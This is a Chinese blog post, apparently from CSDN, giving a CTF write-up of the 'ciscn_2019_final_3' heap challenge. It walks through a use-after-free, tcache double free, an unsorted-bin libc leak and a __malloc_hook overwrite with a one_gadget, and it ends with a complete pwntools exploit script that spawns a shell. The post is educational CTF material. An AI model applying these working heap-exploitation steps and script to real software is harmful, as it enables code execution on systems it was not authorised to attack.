【buu刷题】ciscn_2019_final_3

最新推荐文章于 2024-05-21 13:22:25 发布
最新推荐文章于 2024-05-21 13:22:25 发布
阅读量340 收藏 3
点赞数 2
分类专栏: pwn刷题 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73756460/article/details/129640158
版权

ciscn_2019_final_3

审题

注意此题为libc2.26的堆体 也大概率是我们第一次接触到tcache的题目

tcache全名thread local caching,它为每个线程创建一个缓存(cache),从而实现无锁的分配算法,有不错的性能提升。lib-2.26【2.23以后】正式提供了该机制,并默认开启。

详情请见 Tcache attack - CTF Wiki (ctf-wiki.org)Tcache Attack 学习 - 先知社区 (aliyun.com)

惯例先checksec一下

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-d20X6ii9-1679132357011)(1678982491716.png)]

保护全开的64位程序

放进ida64里看看

标准的菜单题 1添加堆 2删除堆

在这里插入图片描述

1 添加堆

我们先输入我们希望填写的idx的值 将其填入size_4中(idx不得大于0x18不得重复不得为负数)

然后读取size(size不得大于0x78不得为负数)

在unk_2022a0+idx的位置写入malloc到的大小为size的chunk的地址

然后向malloc到的chunk写入大小为size的内容

最后向我们打印出malloc到的chunk的地址

在这里插入图片描述

2 删除堆

输入idx将对应chunk free 但没有将指针归零 存在uaf漏洞

在这里插入图片描述

审题完毕开始解题

解题

既然存在uaf漏洞那我们就可以利用uaf篡改chunk的fd的值然后利用unsorted_bin_attack的方式泄露出libc的基地址 然后将mallochook篡改为one_gadget达成获取控制权的效果

首先我们先利用uaf漏洞

tache double free

先创立大于0x400大小的chunk(目的是将后面构造的fakechunk可以放进unsortedbin中)

tcache的大小为0~0x400

heap=add(0,0x78,'a')#0#add函数的返回值为chunk的地址
print(hex(heap))
add(1,0x18,'b')#1
add(2,0x78,'c')#2
add(3,0x78,'d')#3 
add(4,0x78,'c')#4
add(5,0x78,'d')#5 
add(6,0x78,'c')#6
add(7,0x78,'d')#7 
add(8,0x78,'c')#8
add(9,0x78,'d')#9 
add(10,0x78,'c')#10
add(11,0x78,'d')#11
add(12,0x28,'d')#12

然后我们free两次我们的12号chunk 达成double free的一个效果让tcachebin 0x28链中存入两个地址同为12号地址的chunk

由于我们的申请chunk是在bianjichunk内容前的 因此我们需要申请两次才能成功篡改其中的内容

tcache_get函数 从取出tcache bin list中取出时调用

  1. 向索引为tc_idx的Bin List中拿出Chunk

  2. 对List的entries指针进行了设置,拿出后指向当前chunk的fd

    也就是说当我们利用uaf或者double free漏洞来修改entries的地址时我们需要多free一次 因为第一次malloc时我们还没有篡改内容此时下一个entries的内容依旧是指向原本的chunk只有再第二次free的时候才能将其篡改

static __always_inline void *
tcache_get (size_t tc_idx)
{
  tcache_entry *e = tcache->entries[tc_idx];
  assert (tc_idx < TCACHE_MAX_BINS);
  assert (tcache->entries[tc_idx] > 0);
  tcache->entries[tc_idx] = e->next;
  --(tcache->counts[tc_idx]);
  return (void *) e;
}

然后我们再次申请一个chunk此时就已经跳转到了我们希望他再的heap-0x10的位置上了 我们此时再将chunk0的size位修改为0x421

至此tcache double free流程结束

free(12)
free(12)
add(13,0x28,p64(heap-0x10))#4 修改为chunk0 size的地址
add(14,0x28,p64(0))#5 注意此处我们所填充的内容是啥都可以的
#13和14的地址都是被free叼的12的地址
add(15,0x28,p64(0)+p64(0x421))#get chunk0->size,size需要超过0x400才能进unsortbin

在这里插入图片描述

unsorted bin attack

利用unsouted bin attack来泄露libc的地址

由于我们已经将chunk0的size位篡改为了0x421因此当我们将chunk0free掉的时候会将其放进unsortedbin中

那么此时我们就可以利用unsortedbin attack来泄露libc的地址了

当unsotedbin中有且只有一个chunk的时候 该chunk的fd和bk都会指向一个与 main_arena 有固定偏移的地址

由于我们在unsorted中分下来一块后后面依然在unsortbin里,因此我们先将chunk1free掉

然后add(16,0x78,'e')这样我们在tcache中的chunk1的fd指针就被我们修改成了我们需要泄露的与 main_arena 有固定偏移的地址

然后我们先申请一个大小为0x18的chunk将chunk1重新申请出来 并将entries修改为了我们需要泄露的与 main_arena 有固定偏移的地址

此时我们再次malloc一个0x18的chunk那就会从该地址中申请出一个chunk 然后打印出该地址的实际地址减去偏移我们就能获得libc的基地址

然乎我们就可以通过该libc_base获取到malloc_hook的地址 以及需要利用的one_gadget的地址

free(0) #unsort_bin chunk0->fd=libc
free(1) #tcache
add(16,0x78,'e')#7  从unsortbin分下一块,后面依然在unsortbin里 chunk1->fd=libc
add(17,0x18,'f')#8  get chunk1
libc_base=add(18,0x18,'g')-0x3ebca0#9   get libc
malloc_hook=libc_base+libc.sym['__malloc_hook']
one_gadget=libc_base+0x10a38c
print(hex(libc_base),hex(malloc_hook))
通过tache double free篡改mallochook

利用tache double free将chunk跳转到mallochook的地址然后将其中的内容篡改为one_gadget

此时我们再申请一个chunk就达成了篡夺程序控制权的目的

free(5)
free(5)
add(19,0x78,p64(malloc_hook))
add(20,0x78,p64(malloc_hook))
add(21,0x78,p64(one_gadget))
io.sendline('1')
io.sendline('22')#idx
io.interactive()

需要注意的是我们iteractive后由于使用的是mallochook所以我们输入的指令应当是;cat flag

成功获取到flag

在这里插入图片描述

exp:

#encoding:utf-8
from pwn import *

#io=remote('node3.buuoj.cn',29277)
io=process('./ciscn_final_3')
libc=ELF('./libc.so.6')

context.log_level='debug'

def add(idx,size,data):
    io.recvuntil('choice > ')
    io.sendline('1')
    io.recvuntil('the index')
    io.sendline(str(idx))
    io.recvuntil('the size')
    io.sendline(str(size))
    io.recvuntil('something')
    io.sendline(data)
    io.recvuntil('gift :')
    return int(io.recvline()[2:],16)

def free(idx):
    io.recvuntil('choice > ')
    io.sendline('2')
    io.recvuntil('the index')
    io.sendline(str(idx))   

heap=add(0,0x78,'a')#0
print(hex(heap))
add(1,0x18,'b')#1
add(2,0x78,'c')#2
add(3,0x78,'d')#3 
add(4,0x78,'c')#4
add(5,0x78,'d')#5 
add(6,0x78,'c')#6
add(7,0x78,'d')#7 
add(8,0x78,'c')#8
add(9,0x78,'d')#9 
add(10,0x78,'c')#10
add(11,0x78,'d')#11
add(12,0x28,'d')#12

#gdb.attach(io)
#dup 
free(12)
free(12)
add(13,0x28,p64(heap-0x10))#4 修改为chunk0 size的地址
add(14,0x28,p64(heap-0x10))#5 注意此处我们所填充的内容是啥都可以的
add(15,0x28,p64(0)+p64(0x421))#get chunk0->size,size需要超过0x400才能进unsortbin
#gdb.attach(io)

#overlap
free(0) #unsort_bin chunk0->fd=libc
free(1) #tcache
add(16,0x78,'e')#7  从unsortbin分下一块,后面依然在unsortbin里 chunk1->fd=libc
add(17,0x18,'f')#8  get chunk1
libc_base=add(18,0x18,'g')-0x3ebca0#9   get libc
malloc_hook=libc_base+libc.sym['__malloc_hook']
one_gadget=libc_base+0x10a38c
print(hex(libc_base),hex(malloc_hook))

#dup
free(5)
free(5)
add(19,0x78,p64(malloc_hook))
add(20,0x78,p64(malloc_hook))
add(21,0x78,p64(one_gadget))
#getshell
io.sendline('1')
io.sendline('22')
io.sendline('0;cat flag')

io.interactive()

参考了angel-yan博客

https://blog.csdn.net/mcmuyanga/article/details/113995633

爱若 AI_ruo
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
【pwn】 ciscn_2019_final_3
Nothing
12-18 1692
例行检查 保护全开,分析程序。 add函数 只能申请小于0x78大小的chunk,chunk数量不能超过24个,且目给了申请到内存空间的地址。 free函数 free后指针没有置0,且libc是2.27的,存在tcache dup。唯一问就在于如何得到libc的地址。泄露libc地址一般通过unsortbin,存在tcache的情况下,64位程序需要申请超过0x400大小chunk,fre...
ciscn_2019_final_3
z1r0的博客
12-29 428
ciscn_2019_final_3 查看保护 uaf。 在add时,会给出data区域的地址,理解为fd就行。 2.27有tcache用unstortdbin来泄露需要有一个size大于0x400的chunk。这里借助double free(dup)和uaf改size。达到条件释放,即可有unstorted bin了。 泄露出libc还是用double free + uaf即可申请到hook。具体2.27下的double free(dup)看z1r0’s blog from pwn import *
CISCN2024-Web方向
Err0r233的博客
05-21 1620
被CISCN打烂了,几个都是差一点就出,自己还是太菜了。
[BUUCTF]PWN——ciscn_2019_final_3(tcache dup)
mcmuyanga的博客
03-10 990
ciscn_2019_final_3 附件 步骤: 例行检查,64位程序,保护全开 本地试运行一下,看看大概的情况,提示是堆 64位ida载入 add() remove() 简单的思路:先合并堆块,合并后的堆块大于tcache的范围,然后free掉即可出现libc,接下来就是堆块重叠malloc一个堆块到libc空间,通过gift得到libc地址,接着tcache attack修改__free_hook拿到shell tcache 第一次接触tcache,根据ctfwiki上的知识点简单总结一
ciscn_2019_final_3(tcache)
qq_33590156的博客
08-04 294
漏洞 本中限制了chunk的申请大小,最大只能0x78,无法直接申请大于0x400的chunk free后指针并没有清零,存在uaf tcache中的chunk被拿出时,不会check size 因为是2.27版本,所以tcache中可以直接进行double free(tcache dup) tcache,这个东西在2.23之后的版本中出现,释放的chunk会优先放到tcache中,而同一size的tache chunk最多只能7个,之后再释放此size的chunk,会放到fastbin或者unsorte
buuoj记录 - ciscn_2019_final_3
qq_34010404的博客
03-25 412
看了大佬们的思路才做出来的,这里只记录一下做中踩的坑。 1.add函数 2.del函数 free后没有把数组元素标记为0,存在UAF漏洞. 思路是:1.double free 改fd 到 另一个chunk 的首地址处,然后修改chunksize ,原因是程序限制了分配大小为120字节,free到unsorted bin里面。 2.free chunk 到unsorted bin里面 3.double free 修改fd 到第二步中的chunk,之后便可以malloc 到unsorted bin处,然后
BUU-Reveser-FlareOn5-Web2.0(WebAssembly逆向分析)
最新发布
05-26
3. **分析操作码**:理解WASM指令集,识别关键操作,比如内存访问、算术运算、条件判断等。 4. **跟踪数据流**:追踪变量的分配和使用,找出可能的解密或计算过程。 5. **交互调试**:如果可能,使用像Emscripten...
cipher_CIPHER_
09-29
3. **性能优化**:指导如何利用硬件加速特性来提高加密和解密的速度,尤其是在大量数据处理时。 4. **安全指南**:提供如何安全地管理密钥、防止侧信道攻击(如功率分析)和实施安全策略的建议。 5. **应用示例**...
thuong_mai_dien_tu_magento
03-05
Docker Magento 2.4.X开源(CE)02-2021 用于Magento 2.4.x开发的Docker容器,包括: ... 阿帕奇2.4 MYSQL 8 清漆6 FPC 兔子MQ PhpMyAdmin 记忆快取 弹性搜寻7.x REDIS会话,系统,FPC ... 编辑.env-添加您的...
apachecn#apachecn-ctf-wiki#[WP/BUU/CTF]Cookie-Store-解_車鈊的博客-CSD
07-25
来源:,涉及Cookie的使用方法操作方
your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
pwn赛之your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
baby_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
baby_pwn 赛 ciscn 2019 第十二届全国大学生信息安全竞赛
BUU 论坛的编辑器163Editor
09-21
"BUU 论坛的编辑器163Editor"是一个专为BUU论坛设计的文本编辑工具,它可能集成了丰富的富文本编辑功能,让用户在论坛发帖或回帖时可以方便地添加格式化文本、图片、链接等元素,提升交互体验。"DianUbb.rar"是这个...
POSN:POSN-BUU的源代码
04-01
3. **异常处理**:C++中的异常处理机制用于捕获和处理运行时错误。在POSN-BUU的源码中,可能会有`try-catch`语句块来确保程序在遇到异常情况时能正常退出或恢复。 4. **多线程与并发**:考虑到定位服务可能需要处理...
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
[Buuoj]ciscn_2019_final_3 tcache attack
zylxixixi的博客
10-09 306
Tcache机制的引入 libc2.26以后引入了一个新的机制tcache,类似于fastbin,每条链上允许有7个chunk,多出的chunk会直接放入相应的fastbin或者Unsortedbin,跟以往不同的是,当用户申请chunk时,会优先寻找tcache中的chunk。 因为该机制的引入,提升了处理的速度,但安全性减低了,例如fastbin attach中的double free(tcache dup),free的时候会检查第一个chunk是否为自己,绕过该机制需要构造a->b->
[BUUOJ] ciscn_2019_n_3
Joaus的博客
10-06 1783
这里写自定义目录标漏洞点漏洞利用exp 漏洞点 可以看到主要就是在free的时候没有将相应的数组里的置0,可以导致UAF的漏洞: 漏洞利用 由于本将printf和free函数的指针都放在了申请的堆上,而且程序调用了system函数因此我们就不用泄露libc基址了,我们的目标就是取得对存放指针的堆块的控制。 我们可以利用fastbin的LIFO的机制,取得对存放指针的堆块的控制,修改free指...
Pwn-Ciscn_2019_Final
fayinq的博客
03-11 365
Ciscn_2019_Final 感觉是一道很好的堆,使用了很多技巧以及做思路,包括了uaf,_IO_2_1_stdin,double_free,还有 _IO_2_1_stdin_fileno,这些技巧。 IDA分析: main函数: init函数: 沙箱:(少截取一点为无所谓) allocate函数: 这里面每次无论add了int还是short int 都会把bool修改成1。 delete函数: ​ del有一段特殊判定,就是bool的判定,因为bool的存在,导致了没有办法连续释放i
buu crackrtf
09-26
BUU CrackRTF是一个密码破解目,其中涉及到了...3. 将获取到的数据和输入的密码进行异或操作,得到解密后的字符串。 请注意,以上步骤仅仅是对代码进行分析后的一种破解思路,具体操作还需要根据实际情况进行调整。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值